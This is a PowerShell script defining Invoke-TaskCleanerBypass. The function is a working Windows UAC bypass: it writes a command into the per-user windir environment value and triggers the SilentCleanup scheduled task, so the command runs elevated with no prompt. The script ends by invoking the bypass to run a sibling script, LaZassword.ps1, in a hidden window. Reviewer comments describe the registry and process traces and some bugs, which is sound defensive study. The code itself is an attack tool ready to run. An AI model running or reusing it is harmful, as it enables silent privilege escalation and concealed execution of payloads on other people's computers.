#######################################################
# NO CONFIGURATION NEEDED #
#######################################################
# Create function "Invoke-TaskCleanerBypass"
function Invoke-TaskCleanerBypass {
<#
.SYNOPSIS
Runs a PowerShell command or script file elevated by way of the
\Microsoft\Windows\DiskCleanup\SilentCleanup scheduled task.

.DESCRIPTION
Builds a "powershell /Noni /NoP [/W h] /E <base64>" command line and then:
  - if the caller is already an Administrator (or SYSTEM), starts it directly;
  - otherwise writes it into HKCU:\Environment\windir, starts the
    SilentCleanup task with "schtasks /run", sleeps 5 seconds and deletes the
    value again. The task presumably runs with highest privileges and expands
    %windir% from the per-user environment, so the planted command line is
    executed elevated without a UAC prompt.
The function silently returns unless the current user is a member of the local
Administrators group (SID S-1-5-32-544) and the OS reports version 6.3 or 10+.

Reviewer notes (detection / mitigation):
  - The observable chain is a write to HKCU\Environment\windir, schtasks.exe
    running SilentCleanup on demand, and a powershell.exe child started with an
    encoded command (/E). The registry value only exists for about 5 seconds
    (and is not removed at all if the task launch throws, see Process).
  - Accounts that are not local administrators never reach the elevation path,
    so day-to-day use of non-admin accounts removes the precondition.

.PARAMETER Method
"File" to run a script file (adds the dynamic parameter -FileName) or
"Encoded" to run an already base64-encoded command (adds -EncodedCommand).

.PARAMETER Hide
Adds "/W h" to the PowerShell command line so its window is hidden.

.OUTPUTS
None. The function returns nothing in every path.
#>
[CmdletBinding()]
Param(
[Parameter(Mandatory=$true,Position=0)]
[ValidateSet("Encoded","File")]
[string]$Method,
[Parameter(Mandatory=$false)]
[switch]$Hide
)
# The second mandatory parameter depends on -Method: -FileName for "File",
# -EncodedCommand otherwise. Both are plain [string] parameters.
DynamicParam {
if($Method -eq "File") {
$paramname = "FileName"
} else {
$paramname = "EncodedCommand"
}
#create a new ParameterAttribute Object
$MethodAttribute = New-Object System.Management.Automation.ParameterAttribute
#$testaddAttribute.Position = 3
$MethodAttribute.Mandatory = $true
#$MethodAttribute.HelpMessage = "My test help message"
#create an attributecollection object for the attribute we just created.
$attributeCollection = new-object System.Collections.ObjectModel.Collection[System.Attribute]
#add our custom attribute
$attributeCollection.Add($MethodAttribute)
#add our paramater specifying the attribute collection
$MethodParam = New-Object System.Management.Automation.RuntimeDefinedParameter($paramname, [string], $attributeCollection)
#expose the name of our parameter
$paramDictionary = New-Object System.Management.Automation.RuntimeDefinedParameterDictionary
$paramDictionary.Add($paramname, $MethodParam)
return $paramDictionary
}
Process {
#If the current user is not in the local Administrators group, do not run.
# NOTE(review): $args is normally empty inside an advanced ([CmdletBinding()])
# function, so $userToFind is presumably $null here — confirm what the
# "-match $userToFind" filter below actually excludes.
$userToFind = $args[0]
# Local Administrators group looked up by its well-known SID rather than by name.
$administratorsAccount = Get-WmiObject Win32_Group -filter "LocalAccount=True AND SID='S-1-5-32-544'"
# WMI association filter: all members (Win32_GroupUser) of that group.
$administratorQuery = "GroupComponent = `"Win32_Group.Domain='" + $administratorsAccount.Domain + "',NAME='" + $administratorsAccount.Name + "'`""
$adminusers = Get-WmiObject Win32_GroupUser -filter $administratorQuery | select PartComponent |where {$_ -match $userToFind}
# Bail out unless the membership list contains the current username.
if(!($adminusers -match $env:username)) {
Return
}
#If not Windows 8.1 or higher then exit.
# Version string split on "." so $OSV[0] is the major and $OSV[1] the minor
# component; 6.3 is Windows 8.1 / Server 2012 R2, 10+ is Windows 10 and later.
$OSV = (gwmi -class win32_operatingsystem -Property Version).Version -split "\."
if(!(($OSV[0] -ge 10) -or ($OSV[0] -eq 6 -and $OSV[1] -eq 3))){
Return
}
#Set Variables
if($Method -eq "File") {
# Dynamic parameters are only reachable through $PSBoundParameters.
$File = $PSBoundParameters.Filename
# Resolve to an absolute path; an unresolvable path ends the function quietly.
Try {
$File = (Resolve-Path $File).Path
} catch {
Return
}
} else {
$EncodedCommand = $PSBoundParameters.EncodedCommand
}
# Registry value that is temporarily overwritten for the non-elevated path.
$regpath = "HKCU:\Environment"
$key = "windir"
# Auto-elevating scheduled task that is started on demand (/run ... /I).
$taskrunner = "schtasks"
$taskparam = "/run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I"
# Seconds to leave the windir value in place before removing it.
$waittime = 5
$cmd = "powershell "
# /Noni = non-interactive, /NoP = no profile, /W h = hidden window, /E = encoded command.
if($Hide) {
$cmdparams = "/Noni /NoP /W h /E "
} else {
$cmdparams = "/Noni /NoP /E "
}
if($Method -eq "File") {
# For a script file the payload is a one-liner that reads and iex's the file;
# "/E" expects base64 of the UTF-16LE (Unicode) bytes, hence the Unicode encoding.
$tmpsc = "iex (gc -path `"$File`" -Raw)"
$encode = [System.Convert]::ToBase64String(([System.Text.Encoding]::Unicode.GetBytes($tmpsc)))
$cmdparams += "`"$encode`""
} else {
# Variable names are case-insensitive in PowerShell; this is $EncodedCommand from above.
$cmdparams += "`"$encodedcommand`""
}
# Already elevated (or running as SYSTEM): no task trick needed, start PowerShell directly.
if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]'Administrator') -or (([Environment]::UserName).ToLower() -eq "system")) {
Start-Process ($cmd.Trim()) -ArgumentList $cmdparams
} else {
# Plant the command line as the per-user windir value. The trailing "& ::"
# presumably turns whatever the task appends after %windir% into a cmd comment.
Set-ItemProperty -Path $regpath -Name $key -Value ("cmd /c" + $cmd + $cmdparams + "& ::")
Start-Process $taskrunner -ArgumentList $taskparam
Start-Sleep -s $waittime
# NOTE(review): cleanup is not in a finally block — if Start-Process above throws,
# the modified windir value stays in HKCU (a lasting artifact, and a broken
# environment for the user).
Remove-ItemProperty -Path $regpath -Name $key -Force | Out-Null
}
}
}
# Directory containing this script, used to locate the sibling script below.
$currentdir = [System.IO.Path]::GetDirectoryName($myInvocation.MyCommand.Definition)
# Run LaZassword.ps1 from the same directory through the elevation path above,
# with the PowerShell window hidden. -Filename is a dynamic parameter that only
# exists because -Method File is given. LaZassword.ps1 itself is not on this
# page, so what it does is unknown here.
Invoke-TaskCleanerBypass -Method File -Filename $currentdir\LaZassword.ps1 -hide